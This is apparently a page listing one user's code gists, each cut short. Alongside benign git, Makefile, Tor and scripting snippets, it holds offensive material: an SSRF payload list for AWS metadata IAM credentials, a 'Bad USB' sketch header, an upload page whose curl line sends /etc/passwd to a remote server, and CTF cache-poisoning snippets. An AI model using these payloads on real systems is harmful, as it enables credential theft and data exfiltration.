LuD1161

# From inside the private repo
git remote set-url origin git@github.com-LuD1161:LuD1161/<your_repo>.git

# Also add the following env : Why -> https://medium.com/mabar/today-i-learned-fix-go-get-private-repository-return-error-reading-sum-golang-org-lookup-93058a058dd8
# Probably you would want to add this to ~/.bashrc or ~/.zshrc
export GOPRIVATE=github.com/<your_username_here_not_the_repo_name>
# Like this export GOPRIVATE=github.com/LuD1161

# Other 'not worked for me' methods : 
# https://stackoverflow.com/questions/32232655/go-get-results-in-terminal-prompts-disabled-error-for-github-private-repo

LuD1161

run:
	go run main.go
swagger-gen:
	swagger generate spec -o ./swagger.json --scan-models && ls -alh ./swagger.json
swagger-local:
	swagger generate spec -o ./swagger.json --scan-models && swagger serve -F=swagger swagger.yaml

LuD1161

## Bad USB code

#include "DigiKeyboard.h"

#define WorkingPin 1  // Just as an LED indicator, as to when the work is finished

void setup() {
}

void loop() {

LuD1161

"""
Taken from : 
https://medium.com/@jasonrigden/using-tor-with-the-python-request-library-79015b2606cb
and 
https://www.linuxuprising.com/2018/10/how-to-install-and-use-tor-as-proxy-in.html
script : install-tor.sh

sudo apt install apt-transport-https curl
sudo -i

LuD1161

## AWS 
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname

LuD1161

import asyncio
from aiohttp import ClientSession
import json

headers = {
    'Content-Type': 'application/json',
    'Charset': 'UTF-8',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',
} # Change the headers accordingly

LuD1161

#!/bin/bash

if [ -z "$1" ]
  then
    echo "Target file not specified"
    echo "Usage : ./multiple-targets.sh file_name"
    exit 1
fi

for target in $(cat $1);

LuD1161

<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
<h1> Make sure you've set the right permissions for your "uploads" directory i.e. chmod -R 777 uploads </h1>
  <h2>For curl command : curl -F "uploaded_file=@/etc/passwd" http://server_ip/path_to_this_script/upload.php </h2>
  <form enctype="multipart/form-data" method="POST">
    <p>Upload your file</p>

LuD1161

var token = null;

Promise.all([
    fetch('/api/movies').then(r=>r.json()),
    fetch(`//3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/main.mst`).then(r=>r.text()),
    new Promise((resolve) => {
        if (window.loaded_recapcha === true)
            return resolve();
        window.loaded_recapcha = resolve;
    }),

LuD1161

from time import sleep
import requests
import webbrowser

X_Forwarded_Host = 'my_server'

while True:
    resp = requests.get("http://3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host})
    print resp.headers
    sleep(0.5)